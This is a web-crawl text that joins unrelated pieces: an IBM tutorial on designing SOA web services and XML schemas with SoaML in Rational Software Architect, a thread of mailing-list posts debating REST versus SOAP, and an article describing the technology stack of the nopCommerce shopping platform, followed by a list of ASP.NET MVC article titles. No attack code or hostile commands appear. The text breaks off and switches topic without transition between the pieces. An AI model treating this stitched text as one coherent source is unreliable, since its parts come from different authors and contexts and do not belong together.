Normally, each web service should have three artifacts: - XML schema or XSD - Specification or interface definition - Service or binding This is why the folder structure that we are going to build shortly reflects that. The following steps show how to create the UML project that will be used throughout this article: - Create a UML Project with this name: soaml_example. Other than the following settings, just keep the default values of the wizard: - In the Create Model tab, make sure to select General in the Categories pane and Blank Package in the Templates pane, and then write gov_agency1_serviceModelin the file name field to create a model for Government Agency Service Provider 1. - In the Package Detail tab, select Model in the Package Type frame and uncheck Create a default diagram in the new package in the Default Diagram frame. - In the Model Capabilities tab, check Customize UI and select Modeling, UML Diagram Building Blocks, UML Element Building Blocks, and XSD Transformation Profile, and then click Finish. - Apply SoaML and XSD Transformation UML profiles to the model by following these steps: - Click the gov_agency1_serviceModel model. - In the Properties view, click the Profiles tab. - Click Add Profile, and then, from Deployed Profile drop-down menu, select SoaML. - Repeat the previous step to add XSD Transformation profile. The Properties view of the model will look like Figure 2. Figure 2. Properties view of the model in Rational Software Architect - Create a package called govSrvProvider1.govby right-clicking on the model and selecting Add UML > Package. - Then, delete the freeform diagram that is created by default. - Under this package, create another package called subSystem1. Under that package, create three packages: services, specifications, and xml. - Then delete the freeform diagrams that are created with the packages by default. - Create these packages: - Under the services package, create a package called v1_0. - Under the specifications package, create a package called v1_0. - Under the xml package, create a package called schemas. - Under the schemas package, create a package called v1_0, and then delete the freeform diagram that is created with the schemas package by default. - Apply the stereotypes schema to all of the packages named v1_0 that you created in the previous step by following these steps: - Click the package v1_0. - Click the Stereotypes tab in the Properties view. - Click Apply Stereotypes, and then select schema from the list. - Import XSD primitive Data Types to the model (these primitive data types can be used to use primitive types, such as string, int, and float in the schema): - Right-click on the gov_agency1_serviceModel model, and select UML Properties. - Select ElementImport from the left frame and click the arrow button in the right frame. - In the Search field, write XSDand select «modelLibrary» XSDDataTypes – XSDDataTypes. The project will then look like Figure 3. Figure 3. Project after creating model and packages for the government provider - Create another model gov_commonSchema. - Under this model, create the packages government.gov > commonTypes > xml > schemas > v1_0 and delete all the freeform diagrams that are created with these packages by default except the one that is with the package v1_0. - Repeat step 6 and 7 for the package v1_0 and the model gov_commonSchema. The project will look like the following figure. Figure 4. Project after creating model and packages for all government agencies In a real environment, for better model management and governance, the common schema should have been created in a separate project. However, for simplicity, we have everything in one project in this example. Tips: Creating the folder structure in a way that separates the data model, service specification, and service binding is a best practice from both source control management and development perspectives. Also, having the version number, v1_0, as part of the folder structure and namespace (as it will be shown shortly) is a governance best practice. XML schema definition design Messages are passing between web service providers and consumers. Messages consist of elements that have data types. These data types are defined in a schema. Before we go through the example, we will explain briefly how to create the main structures of any schema. For more information about this, see the XML schema transformation profile links in Resources. These structures are simple and complex data types. The XSD transformation profile will be used to transform the UML structures into the schema definition. Simple data type Applying the «SimpleType» stereotype to a UML class results in an XML schema simple type definition. Restriction of any simple type to a primitive XSD data type is possible by applying the «restriction» stereotype to a UML generalization relationship. You can manipulate any of the restriction properties of the XSD simple type in the XSD SimpleType tab of the Properties view. Primitive data types were imported into the model in the previous steps of creating the project and model. As an example of manipulating the properties of a simple data type, in the EmailAddressType simple type, the pattern value is set to this, as shown in the figure that follows: [0-9A-Za-z'\.\-_]{1,127}@[0-9A-Za-z'\.\-_]{1,127} Figure 5. XSD simple type in UML When transformed into XSD, that figure looks like the code in Listing 1. Listing 1. XSD simple type in XML <xsd:simpleType <xsd:restriction <xsd:pattern </xsd:restriction> </xsd:simpleType> Enumeration Enumeration is a special type of the simple type. It is needed when there should be a specific list of constant values to be used for the simple type defined by the enumeration. A common example of enumeration for gender is shown in the following figure. Figure 6. XSD enumeration in UML When transformed into XSD, that looks like the following code. Listing 2. XSD enumeration in XML <xsd:simpleType <xsd:restriction <xsd:enumeration <xsd:enumeration </xsd:restriction> </xsd:simpleType> Complex data type To create a complex type, a «complexType» stereotype must be applied to a UML class (see the next figure). The properties of the complex type can be manipulated in the XSD Complex Type tab of the Properties view. You can add elements to the complex type by adding attributes with the «element» stereotype to the UML class. These attributes are either added directly by primitive XSD data types or associated by other types defined in user-specific schemas. Note: The minOccurs attribute of any element can be specified by setting the Multiplicity of the attribute. Figure 7. XSD complex type in UML Listing 3 shows this model the XSD. Listing 3. XSD complex type in XML <xsd:complexType <xsd:sequence> <xsd:element <xsd:element <xsd:element <xsd:element </xsd:sequence> </xsd:complexType> Common schema definition The common schema defines the XSD data types that are shared between all participants in the SOA project, thus all other government agencies in this example. The common schema has one major advantage of having all common data types defined away from any specific service provider. This allows for more control and governance on these common types and minimizes the interdependencies between the service providers' schemas. However, the common schema has one major disadvantage: any update to the common schema requires synchronization with all service participants that depend on it. Creating the schema in UML is just creation of a class diagram and applying the appropriate stereotypes, as explained before. The following figure depicts the common schema in the example presented in the article. Figure 8. XSD common schema example Note: The whole set of schema properties are available in the XSD Schema tab in the Properties view. In the example, only three of the properties have been set, as the following figure shows. Figure 9. XSD schema properties To change these properties: Under the gov_commonSchema project, select the schema v1_0 under government.gov > commonTypes > xml > schemas > v1_0, and set the properties in the XSD Schema tab in the Properties view: - Element from Default to qualified - Target Namespace to urn:government.gov/commonTypes/xml/schemas/v1_0/ - Target Namespace Prefix to govxsd Tips: It is a good practice to have the Target Namespace follow the same package structure of your schema. Also, documentation can be added to the schema or any data type or element in the schema through the Documentation tab in the Properties view. The schema model in the project structure will look like the following screen capture. Figure 10. Common schema model view in the Project Explorer Web service XML schema definition design Now it is time to start working on the web service artifacts. Normally, this activity starts with creating the web service schema definition, and then creating the web service WSDL definition or the web service interface, and, finally, creating the web service WSDL binding. The web service that is presented in our example, which is the web service that is provided by the Government Agency Service Provider 1, is about getting the birth certificate of a person. The schema of this service is depicted in the following figure. Figure 11. XSD schema of Government Agency 1, service example Larger view of Figure 11. Again, creating the schema in UML is just creation of a class diagram with applying the appropriate stereotypes. As before with the common schema definition, you need to set three properties of the schema.. - To change these properties, in the gov_agency1_serviceModel project, under govSrvProvider1.gov > subSystem1 > xml > schemas > v1_0, click the v1_0 schema , and set these properties in the XSD Schema tab in the Properties view: - Element from default to qualified - Target Namespace to urn:govSrvProvider1.gov/subSystem1/xml/schemas/v1_0/ - Target Namespace Prefix to govprv1xsd Web service specification design Now, it is time to build the WSDL interface definition of the web service. It is always best to separate the web service interface definition, which is the WSDL port type, from the web service WSDL binding. A binding defines message format and protocol details for operations and messages defined by a particular WSDL port type. Besides the separation of concerns, that separation of WSDL port type from the WSDL binding in two documents allows for any number of bindings for a given port type. The following steps show how to create a web service WSDL port type in UML. - Under govSrvProvider1.gov > specifications > v1_0, open the Main freeform diagram - To add a web service interface, from the Service tray in the Palette, click the Service Interface (simple) and click the diagram. Then name it BirthCertificateInfo. - Add an operation to this interface normally, like adding any operation to a UML interface, and then name it getBirthCertById. - Create messages for the operation that you just created. The purpose of the messages is to wrap whatever input or output parameters to the operation in one request message and one response message. - From the Class tray in the Palette, click the Stereotyped Class and click the diagram. Then select Create «MessageType» Class from the drop-down menu, and name it getBirthCertByIdRequest . - Repeat the previous step to create another message with the name getBirthCertByIdResponse . - Add an attribute to getBirthCertByIdRequest and name it ID. Set its type to string and add the «element» stereotype to it. - Add an attribute to getBirthCertByIdResponse, and name it birthcertificate. Set its type to BirthCertificate from the schema of the service, and add the «element» stereotype to it. - Click on the interface that you just created and, in the Operations tab in the Properties view. - Click the Owned Parameter button and, when a pop-up window opens, click the Insert New Parameter button three times to add three parameters. - The first parameter is the input parameter to the operation. For the first parameter, change its Name to Id, and set its Type to getBirthCertByIdRequest, which can be done by typing in the Search field. Tip: You might need to scroll right to set the properties of this parameter. - The second parameter is the output parameter of the operation. Change its Name to birthCert, set its Direction to Return, and set its Type to getBirthCertByIdResponse by typing in the Search field. Tip: You might need to scroll right to set the properties of this parameter. - The third parameter is the exception of the operation. Change its Name to fault, set its Direction to Return, set Is Exception to true, and then click Browse and select government.gov > commonTypes > xml > schemas > v1_0. Set the parameter Type to ExceptionType. - Select govSrvProvider1.gov > xml > schemas, and then click the v1_0 schema to set the following properties in the XSD Schema tab in the Properties view: - Element from Default to qualified - Target Namespace to urn:govSrvProvider1.gov/subSystem1/specifications/v1_0/ - Target Namespace Prefix to srvspc1xsd The web service interface will then look like the following figure. Figure 12. Web service WSDL interface UML example The web service interface is now complete, so you can define any binding to that interface. Web service binding design Now it is time to specify binding for the WSDL interface of the web service. The binding references the port type that it binds. To add a binding in this example, follow these steps: - Select govSrvProvider1.gov > services > v1_0,open the Main freeform diagram. - From the Service tray in the Palette, click on a Participant and then click the diagram. Name it BirthCertificateInfoService. - In the Project Explorer, right-click on «Participant» BirthCertificateInfoService and select Add Service Modeling > Service Point. Then click Select Existing Element and search for «ServiceInterface»BirthCertificateInfo and select it. After that, name it BirthCertificateInfoPort. The web service WSDL binding component will then look like the following figure. Figure 13. Web service WSDL binding UML example After the UML model for the web service is ready, it is time to transform this UML model to WSDL and XSD artifacts. To do that, you need to create a transformation configuration. Transformation configuration It is always best to have two different transformation configurations: one for WSDL and the second for XSD. This is to give you better change management on the WSDL and XSD, separately. For example, most of the time, there is a change in the schema, and then the XSD has to be updated without any change to the WSDL. So, for this example, you will create three transformation configuration files: - One for UML to XSD for the common schema - Another one for UML to XSD for the government agency - The last one for UML to WSDL for the government agency UML- to-XSD transformation configuration Start with the steps to create a UML-to-XSD transformation configuration for the common schema: - Create a folder, and name it WSDLby right-click on the project and selecting New > Folder. This folder is to contain the WSDL and XSD files that will be generated. - To create a transformation configuration, click Modeling > Transform > New Configuration in the menu. Name it gov_commonSchema_uml2xsdV1_0, and from the Service Oriented Architecture Transformations folder, select UML to XSD from the Transformation menu. Then, click Next. - From the Source and Target page, in the Selected source menu, select «schema» v1_0 from gov_commonSchema>government.gov>commonTypes>xml>schemas. Next, select the WSDL folder in the Selected target menu. Then click Finish. The gov_commonSchema_uml2xsdV1_0.tc file is created and opened. - In the Main tab, in Merge options, select the Do not merge: Warn before overwriting any files option. - In the Output Options tab, select v1_0 in the File Name column of the table. Then, uncheck the Add suffix check box and in the Add prefix field, write commonSchema, so the file name will be commonSchema_v1_0. Click the desk icon or press Control + s to save the file. Repeat the previous steps with the appropriate source and target to create a transformation configuration with the name gov_agency1Schema_uml2xsdV1_0.tc for the schema of the service of the government agency, with the schema file name of govAgency_srvSchema_v1_0. Service transformation configuration Now, let us create a transformation configuration for the service itself: - Click Modeling > Transform > New Configuration in the menu. Name the configuration gov_agencyPrv_Srv1_uml2wsdlV1_0, and from the Transformation menu from the Service Oriented Architecture Transformations folder, select UML to WSDL. Then click Next. - From the Source and Target page, in the Selected source menu, from gov_agency1_serviceModel>govSrvProvider1.gov>subSystem1>services>v1_0, select «Participant» BirthCertificateInfoService.. Next select the WSDL folder in the Selected target menu. Then click Finish. The gov_agencyPrv_Srv1_uml2wsdlV1_0.tc file is created and opened. - In the Main tab, in Merge options, select Do not merge: Warn before overwriting any files. - In the Output Options tab, do the following: - Select BirthCertificateInfoService in the File Name column of the table, uncheck the Add prefix check box, and in the Add suffix field, write _v1_0. - Select v1_0 in the File Name column of the table that corresponds to specifications. Then uncheck the Add suffix check box and in the Add prefix field, write BirthCertificateInfo, so the file name will be BirthCertificateInfo_v1_0. - Select v1_0 in the File Name column of the table that corresponds to subsystem/xml/schema. Then uncheck the Add suffix check box and write in the Add prefix field, write govAgency_srvSchema, so the file name will be govAgency_srvSchema_v1_0. - Select v1_0 in the File Name column of the table that corresponds to commonTypes. Then uncheck the Add suffix check box and in the Add prefix field, write commonSchema, so the file name will be commonSchema_v1_0. Click the desk icon or press Control + s to save the file. The web service model in the Project Explorer will look like the next figure. Figure 14. Government Agency 1 service example Project Explorer view Transforming the web service model into WSDL and XSD It is preferable to transform the common schema before the service artifacts, because the later depends on the former. So, to transform the model into the WSDL and XSD files, follow these steps: - Open gov_commonSchema_uml2xsdV1_0 if it is not open. - Click the Run button. A file named commonSchema_v1_0.xsd, along with the folder structure government > gov > commonTypes > xml > schemas > v1_0, will be created. Following similar steps with gov_agency1Schema_uml2xsdV1_0.tc and gov_agencyPrv_Srv1_uml2wsdlV1_0.tc will lead to creation of BirthCertificateInfo_v1_0.wsdl and BirthCertificateInfoService_v1_0.wsdl, respectively. Note: Running the transformation configuration again will prompt you for replacing the output file, because you selected the Do not merge: Warn before overwriting any files option in the Merge options in the steps for creating the transformation configuration. Summary Using an example, this article presented a practical way of designing web services and schema definitions for SOA projects by using SoaML and XSD transformation UML profiles. This way can be used by architects and developers who want to build web services in a top-down approach, using UML, and abstract away from the details of XML. You now know the necessary steps of modeling a web service and its data model. Download Resources Learn - For more about SoaML, SOA, and service-oriented modeling: - SoaML, an OMG standard profile that extends UML 2 for modeling services, service-oriented architecture (SOA), and service-oriented solutions. The profile has been implemented in IBM Rational Software Architect. - XML Schema Transformation Profile, a UML profile of stereotypes that extend models with XML schema properties that cannot be represented in UML alone. - UML 2.0 Profile for Software Services, a profile for UML 2.0 that allows for the modeling of services, (SOA, and service-oriented solutions. - Design SOA services with Rational Software Architect, a four-part IBM developerWorks tutorial series by Lee Ackerman and Bertrand Portier (2006-2007) shows how to design SOA services by using a UML Software Service Profile. - Service-oriented modeling and architecture: How to identify, specify, and realize services for your SOA by Ali Arsanjani is about the IBM Global Business Services' Service- Oriented Modeling and Architecture (SOMA) method (IBM developerWorks, November 2004). -.
http://www.ibm.com/developerworks/rational/library/design-soa-services-schema-definitions/?cmp=dw&cpb=dwrat&ct=dwnew&cr=dwnen&ccy=zz&csr=051211
CC-MAIN-2014-23
refinedweb
3,895
53.41
This is an interesting program that takes a second to think about. The issue here is logic. Basically, we gather the number of rows we want and compare it in our first for statement. It’s going to be greater then zero so we enter our loop and see another for statement. If ‘d” is still less than rows – less, we output a decimal point. we then enter out next for statement which looks at integer “a” and compares our “less” value against it. The resulting number is how many asterisk are outputted after out decimal points. We then increment “less” until we reach our rows value, as checked in our first for statement. 9. Write a program using nested loops that asks the user to enter a value for the number of rows to display. It should then display that many rows of asterisks, with one asterisk in the first row, two in the second row, and so on. For each row, the asterisks are preceded by the number of periods needed to make all the rows display a total number of characters equal to the number of rows. A sample run would look like this: Enter number of rows: 5 ….* …** ..*** .**** ***** #include <iostream> using namespace std; int main() { int rows = 0; int less = 1; cout << "Enter number of rows: "; cin >> rows; for(int i=0; i < rows; i++) { for(int d=0; d < (rows - less); d++) cout << "."; for(int a=0; a < less; a++) cout << "*"; cout << endl; less++; } return 0; }
https://rundata.wordpress.com/2012/11/21/c-primer-chapter-5-exercise-9/
CC-MAIN-2017-26
refinedweb
251
79.19
What is a Convolutional Neural Network (CNN)? How can they be used to detect features in images? This is the video of a live coding session in which I show how to build a CNN in Python using Keras and extend the "smile detector" I built last week to use it. A 1080p version of this video can be found on Cinnamon A Convolutional Neural Network is a particular type of neural network that is very suited to analysing images. It works by passing a 'kernel' across the input image (convolution) to produce an output. These convolutional layers are stacked to produce a deep learning network and able to learn quite complex features in images. In this session I coded a simple 3-layer CNN and trained it with manually classified images of faces. Much of the code was based on the previous iteration of this. Subsequent to the live coding session, I actually refactored the code to use python generators to simplify the processing pipeline. Frame Generator This method opens the video file and iterates through the frames yielding each frame. def frame_generator(self, video_fn): cap = cv2.VideoCapture(video_fn) while 1: # Read each frame of the video ret, frame = cap.read() # End of file, so break loop if not ret: break yield frame cap.release() Calculating the Threshold Like in the previous session, we iterate through the frames to calculate the different between each frame and the previous one. It then returns the threshold needed in which to filter out just the top 5% of images: def calc_threshold(self, frames, q=0.95): prev_frame = next(frames) counts = [] for frame in frames: # Calculate the pixel difference between the current # frame and the previous one diff = cv2.absdiff(frame, prev_frame) non_zero_count = np.count_nonzero(diff) # Append the count to our list of counts counts.append(non_zero_count) prev_frame = frame return int(np.quantile(counts, q)) Filtering the Image Stream Another generator that takes in an iterable of the frames and a threshold and then yields each frame whose difference from the previous frame is above the supplied threshold. def filter_frames(self, frames, threshold): prev_frame = next(frames) for frame in frames: # Calculate the pixel difference between the current # frame and the previous one diff = cv2.absdiff(frame, prev_frame) non_zero_count = np.count_nonzero(diff) if non_zero_count > threshold: yield frame prev_frame = frame Finding the Smiliest Image By factoring out the methods above we can chain the generators together and pass them in to this method to actually look for the smiliest image. This means that (unlike the previous version) this method doesn't need to concern itself with deciding which frames to analyse. We use the trained neural network (as a Tensorflow Lite model) to predict whether a face is smiling. Much of this structure is similar to last session in which we first scan the image to find faces. We then align each of those faces using a facial aligner -- this transforms the face such that the eyes are in the same location of each image. We pass each face into the neural network that gives us a score from 0 to 1.0 of how likely it is smiling. We sum all those values up in order to get an overall score of 'smiliness' for the frame. def find_smiliest_frame(self, frames, callback=None): # Allocate the tensors for Tensorflow lite self.interpreter.allocate_tensors() input_details = self.interpreter.get_input_details() output_details = self.interpreter.get_output_details() def detect(gray, frame): # detect faces within the greyscale version of the frame faces = self.detector(gray, 2) smile_score = 0 # For each face we find... for rect in faces: (x, y, w, h) = rect_to_bb(rect) face_orig = imutils.resize(frame[y:y + h, x:x + w], width=256) # Align the face face_aligned = self.face_aligner.align(frame, gray, rect) # Resize the face to the size our neural network expects face_aligned = face_aligned.reshape(1, 256, 256, 3) # Scale to pixel values to 0..1 face_aligned = face_aligned.astype(np.float32) / 255.0 # Pass the face into the input tensor for the network self.interpreter.set_tensor(input_details[0]['index'], face_aligned) # Actually run the neural network self.interpreter.invoke() # Extract the prediction from the output tensor pred = self.interpreter.get_tensor( output_details[0]['index'])[0][0] # Keep a sum of all 'smiliness' scores smile_score += pred return smile_score, frame best_smile_score = 0 best_frame = next(frames) for frame in frames: # Convert the frame to grayscale gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) # Call the detector function smile_score, frame = detect(gray, frame) # Check if we have more smiles in this frame # than out "best" frame if smile_score > best_smile_score: best_smile_score = smile_score best_frame = frame if callback is not None: callback(best_frame, best_smile_score) return best_smile_score, best_frame We can then chain the functions together: smiler = Smiler(landmarks_path, model_path) fg = smiler.frame_generator(args.video_fn) threshold = smiler.calc_threshold(fg, args.quantile) fg = smiler.frame_generator(args.video_fn) ffg = smiler.filter_frames(fg, threshold) smile_score, image = smiler.find_smiliest_frame(ffg) Output Testing it out it all works pretty well, and finds a nice snapshot from the video of smiling faces. The full code to this is now wrapped up as a complete Python package: Smiler This is a library and CLI tool to extract the "smiliest" of frame from a video of people. It was developed as part of Choirless as part of IBM Call for code. Installation % pip install choirless_smiler Usage Simple usage: % smiler video.mp4 snapshot.jpg It will do a pre-scan to determine the 5% most changed frames from their previous frame in order to just consider them. If you know the threshold of change you want to use you can use that. e.g. The first time smiler runs it will download facial landmark data and store it in ~/.smiler location of this data and cache directory can be specified as arguments % smiler video.mp4 snapshot.jpg --threshold 480000 …… % smiler -h usage: smiler [-h] [--verbose] [--threshold THRESHOLD] [--landmarks-url LANDMARKS_URL] [--cache-dir CACHE_DIR] [--quantile QUANTILE] video_fn image_fn Save thumbnail of smiliest frame in video positional arguments: video_fn filename for video to I hope you enjoyed the video, if you want to catch them live, I stream each week at 2pm UK time on the IBM Developer Twitch channel: Top comments (1) Very nice project :)
https://practicaldev-herokuapp-com.global.ssl.fastly.net/hammertoe/using-a-convolutional-neural-network-cnn-to-detect-smiling-faces-1700
CC-MAIN-2022-40
refinedweb
1,022
55.24
In this article, we consider the stack of technologies used in nopCommerce, the most popular ASP.NET shopping cart in the world. nopCommerce has been developed and supported by professionals since 2008. We, the nopCommerce team, always try to keep nopCommerce running on the latest technologies to offer the best experience possible to our users. That's why nopCommerce is the leading ASP.NET-based open-source eCommerce platform for now. nopCommerce is a fully customizable shopping cart, stable, secure, and extendable. From downloads to documentation, nopCommerce.com offers a comprehensive base of information, resources, and support from the nopCommerce community. nopCommerce version runs on .NET Core. Since it's cross-platform it can be run on Windows, Linux, or Mac OS. nopCommerce also supports different database types. So let's start by describing the data access layer. Databases On the Data access layer, you are allowed to use Microsoft SQL Server, MySQL, and PostgreSQL as backend databases. - SQL Server is Microsoft's full-featured relational database management system. - MySQL is the world's most popular open-source database. With its proven performance, reliability, and ease of use, MySQL has become the leading database choice for web-based applications. - PostgreSQL is a powerful, open-source object-relational database system with over 30 years of active development that has earned a strong reputation for reliability, feature robustness, and performance. The possibility to use all these databases is coming out of the box so you don't need lots of extra configuration to set this up. If you look at the source code, you see the appropriate data providers: PostgreSqlDataProvider, MySqlDataProvider, MsSqlDataProvider in the Nop.Data project. Redis Next, nopCommerce uses Redis. As you may know, Redis is an open-source, in-memory data structure store, used as a database, cache, and message broker. Redis is applied to distributed applications, for example, with web farms scenarios. Using Redis allows us to store old data as an in-memory cache dataset. This approach significantly boosts the speed and performance of the application. This is the piece of code from the appsettings.json file that allows you to set up Redis in nopCommerce: "DistributedCacheConfig": { "DistributedCacheType": "redis", "Enabled": false, "ConnectionString": "127.0.0.1:6379,ssl=False", "SchemaName": "dbo", "TableName": "DistributedCache" }, There are also another distributed cache types you can choose from: This screenshot represents the distributed cache settings from the admin area -> App settings page. Microsoft Azure The next noteworthy technology that nopCommerce uses is. nopCommerce can be deployed on Azure using FTP, Visual Studio web deploy, or using Web platform installer. Azure supports multiple instances of nopCommerce. It's great for any application scalability. Using this feature, you may not worry whether your site can handle a large number of visitors. Azure also allows us to use BLOB storage, distributed caching, and session management support. This is the piece of code from the appsettings.json file that allows you to set up Azure BLOB storage in nopCommerce: "AzureBlobConfig": { "ConnectionString": "", "ContainerName": "", "EndPoint": "", "AppendContainerName": true, "StoreDataProtectionKeys": false, "DataProtectionKeysContainerName": "", "DataProtectionKeysVaultId": "" }, It can also be set up from the admin area: This screenshot represents the Azure BLOB storage settings from the admin area -> App settings page. Business logic Then, let's discuss the technologies we use in the nopCommerce Business logic layer. Linq2DB First of all, it's LINQ to DB, which is the LINQ database access library offering a simple, light, fast, and type-safe layer between objects and the database. In other words, it enables us to work with a database using .NET objects. It can map .NET objects to various numbers of database providers. You may choose between MS SQL Server, MySql server, and PostgreSQL. So, LINQ to DB is kind of a bridge between the Business Logic layer and the Data layer. If we analyze the code, we can easily find that each database is supported by its own class that implements the INopDataProvider interface and depends on the Linq2DB library: Also, note that all work with table data is carried out through the IRepository This approach commits us to control the creation of the table in the database. FluentMigrator To control the creation of the database objects we use the FluentMigrator library. FluentMigrator is a migration framework for .NET. Migrations are a structured way to alter the database schema and are an alternative to creating lots of SQL scripts that have to be run manually by every developer involved. Migrations solve the problem of evolving a database schema for multiple databases. For example, the developer's local database, the test database, and the production database. Database schema changes are described in classes written in C# that can be checked into a version control system. To see how we use FluentMigrator in the code, open the CategoryBuilder class which represents the Category entity configuration for the database: As a parameter of the MapEntity method, you can see the CreateTableExpressionBuilder class, which is the FluentMigrator class that allows us to apply special rules for entity mapping when creating this table. Then, let's open the DataMigration class: This class inherits from the abstract Migration class. You can create your own migrations which should also be derived from this abstract class. So, as you can see, we use this class to migrate data from one version of nopCommerce to another. This way we add new records, new columns, or even delete columns. We also have such migration classes to migrate settings and local resources. In the past nopCommerce versions, we used SQL upgrade scripts to apply such changes to the database, which wasn't as handy as it is now. Now, using the FluentMigrator library allows us to simplify the migration process to any database framework. AutoMapper The next library, which is introduced in this article, is AutoMapper. AutoMapper is a simple library that helps us to transform one object type to another. It is a convention-based object-to-object mapper that requires very little configuration. We need this library, for example, when it comes to retrieving entities from the database and populating the appropriate models. To illustrate it, we open the StoreController of the admin area. Here we find the Edit() method which returns a view enabling a Store editing. In this method, as you can see, we retrieve the store from the database first: Then, in the PrepareStoreModel() method there is just one line that maps the entity to a new model: This is exactly why we need AutoMapper. At the same time, in the AdminMapperConfiguration we have already configured how exactly the store entity should be mapped to the model: Fluent Validation The next library we discuss is Fluent Validation. It's a validation library for .NET that uses a fluent interface and lambda expressions for building validation rules. We need validation to ensure that data inserted satisfies defined formats and other input criteria during customer registration, creating and updating products and categories in the admin area, adding blog posts, etc. Let's look closer. For example, the RegisterValidator class sets validation rules for RegisterModel which is used for customer registration: In this class we see a rule saying that the Email field should not be empty, but if it is, the validator returns the "required" message to a customer. In addition, an inserted email should also match the email address criteria. There are many other validation rules in this file. ASP.NET Core internal dependency injection As you may know, nopCommerce supports the dependency injection software design pattern, which is a technique for achieving Inversion of Control between classes and their dependencies. It allows nopCommerce to stay easy modifiable as it grows in size and complexity. To achieve this we use the built-in ASP.NET Core internal dependency injection. To illustrate the dependency injection in the code, let's look, for example, at the ProductService class: Here we have many dependencies going into the constructor. If we look at the implementation of one of those dependencies, for example, at the CustomerService we see that it contains a bunch of dependencies as well: And to resolve these dependencies we create the DependencyRegistrar class where the AddScoped() method registers such services as ProductService, CustomerService, and others: So, using the ASP.NET Core internal dependency injection, we have a service container that takes on the responsibility of creating an instance of the dependency and disposing of it when it's no longer needed. And we can easily inject the service into the constructor of the class where it should be used. Autofac We also use the Autofac library which is an addictive Inversion of Control container for .NET. Autofac is one of the libraries we use right now, but, it's important to say, we use this library to only wrap the built-in Dependency Injection container from ASP.NET Core. That's why you can find out that the only file where we access the Autofac namespace is the Program class: Look at the Main method where we override the factory used to create the service provider. User interface Further, let's see which libraries we use in the User interface layer. Razor View Engine Razor View Engine allows us to embed server-based code into web pages to produce HTML. Let's look at the category page view: Razor enables us to easily render the category name and to render the details like the description. It processes considering conditions, such as if the description is not empty we render the appropriate HTML code. Using Razor we can also iterate and display subcategories or featured products. jQuery We also use jQuery which is a javascript library used to extend the UI&UX functionality of HTML pages. You can find the appropriate javascript files in the "js" folder in wwwroot: jQuery DataTables and more In addition, particularly, to display the data in tables in the admin area we use a DataTables plug-in for jQuery. Such tables look like this: We also use a lot of other jQuery plugins so we don't need to reinvent the wheel and can concentrate on things that matter. - View in ASP.NET MVC - How to bind a model to a partial view in ASP.NET MVC? - How to define a custom action selector in ASP.NET MVC? - How to display an error message using ValidationSummary in ASP.NET MVC? - How to enable client side validation in ASP.NET MVC? - How to enable bundling and minification in ASP.NET MVC? - How to pre-compile razor view in ASP.NET MVC? - How to set image path in StyleBundle? - What is RouteData in ASP.NET MVC? - Difference between Html.RenderBody() and Html.RenderSection() in ASP.NET MVC - Difference between Html.Partial() and Html.RenderPartial() in ASP.NET MVC - How to use web.config customErrors in ASP.NET MVC? - How to display a custom error page with error code using in ASP.NET MVC? - How to create a custom filter in ASP.NET MVC?
https://www.tutorialsteacher.com/articles/build-ecommerce-application-on-dotnet-framework
CC-MAIN-2022-21
refinedweb
1,825
55.44
Re: [rest-discuss] RE: [xml-dev] ANN: Building Web Services the REST Way Expand Messages - Matt Gushee wrote: >Actually, you should read this: >... > > Okay, here's the forest as I see it: > > SOAP has existed for about 2 1/2 years, and from very early on has been > heavily promoted by both Microsoft and IBM. >...IIRC, Lotus Notes and Compuserve had all of the industry momentum in > So the fact that REST isn't on the verge of taking over the world means > what, exactly? 1993/1994. The Web was an academic toy. That analogy was not picked at random. Both of those products failed to understand the importance of global, open, linking and addressing. -- Come discuss XML and REST web services at: Open Source Conference: July 22-26, 2002, conferences.oreillynet.com Extreme Markup: Aug 4-9, 2002, > -----Original Message-----Well said. Perhaps the problem is that industry is not fully cognizant > From: Paul Prescod [mailto:paul@...] > > There is nothing trivial about a the amount of money industry > has spent implementing the REST architecture. I'm sorry if it > seems that way to you. One of the main inventors of REST is > also one of the lead designers of Apache (Fielding). So > surprise, surprise, Apache has REST ideas deep down in its > core. I see nothing trivial about pointing that out. PHP's > developers are strongly influenced by the Apache group, so > PHP has REST ideas deep down in its core too. etc. etc. for IIS. of what it has been building. I'm reminded that many programmers did not realize fully what they were doing with OO until the likes of Jim Coplien and the GoF articulated the idea of Software Patterns. Bill de hÓra .. Propylon - Bill de hÓra wrote: >True enough. We all learned web programming so incrementally. It was >... > > Well said. Perhaps the problem is that industry is not fully cognizant > of what it has been building. I'm reminded that many programmers did not > realize fully what they were doing with OO until the likes of Jim > Coplien and the GoF articulated the idea of Software Patterns. never approached as an architectural style, it was always tactical: "gotta get this information up today. Better give a different URI to each thing so it can be bookmarked. Oops, using POST messes up the 'refresh' button. Better use GET." etc. -- Come discuss XML and REST web services at: Open Source Conference: July 22-26, 2002, conferences.oreillynet.com Extreme Markup: Aug 4-9, 2002, > -----Original Message-----Sure, but that's what J2EE is according to Sun. A big beast. > From: S. Mike Dierken [mailto:mdierken@...] > Sent: 05 July 2002 18:17 > To: rest-discuss@yahoogroups.com > Subject: Re: [rest-discuss] Re: [xml-dev] ANN: Building Web > Services the REST Way > > > > ----- Original Message ----- > From: "Bill de hÓra" <dehora@...> > > > J2EE is way (waayy) more complicated than SOAP; > > EJB+Servlets+JDBC+JAAS+RMI-IIOP+JNDI+JMS... > > That's because it's doing different things. > I wouldn't include IIOP (from Corba) or RMI (from Java) -Yep, but the interop standard for EJB is RMI-IIOP, not RMI; historically > optional & usually available but not required in J2EE. that was invented to keep the CORBA crowd happy. And it's essence is synchronous, RPC and pass by value. I honestly don't know how well the stubs and skeletons thing fits with REST, but otherwise RMI-IIOP doesn't strike me as a RESTful protocol. > JAAS is probably just asJAAS looks nice, it does much the same for authentication and > core - I just don't happen to have any experience with it. authorization that JNDI does for directories and JDBC does for datasources. Clients can declare controls impendent of implementations. I wanted to use it an upcoming project, but I didn't think there was time for me to pick it up properly. Bill de hÓra .. Propylon - Paul wrote: > I don't see the problem. REST is the architecture of the Web and a RESTI agree with your position that any web development platform could be called a > toolkit would be a piece of software that helps you build the mediating > layer between your application and the Web. AFAIK, that's what (e.g.) > J2EE and Zope are used for. Now that XML has come along it makes sense > to want to extend these things. Just as they had native knowledge of > HTML, you might want to give them native knowledge of XML and RDF. And > maybe newer toolkits could better enforce best practices. But overall, I > see no problem calling any web development platform a REST toolkit. REST > is not something new. REST toolkit. However, I think a more RESTful toolkit should have types defined in its namespace that correspond to Fielding's documented approach if it's going to make programming RESTfully feel more concretely similar (and IMO easier to comprehend the REST style). For example, here are some of the objects that are being implemented in my toolkit (sorry I keep bringing up my own vaporware, but it's the most concrete thing I have right now): 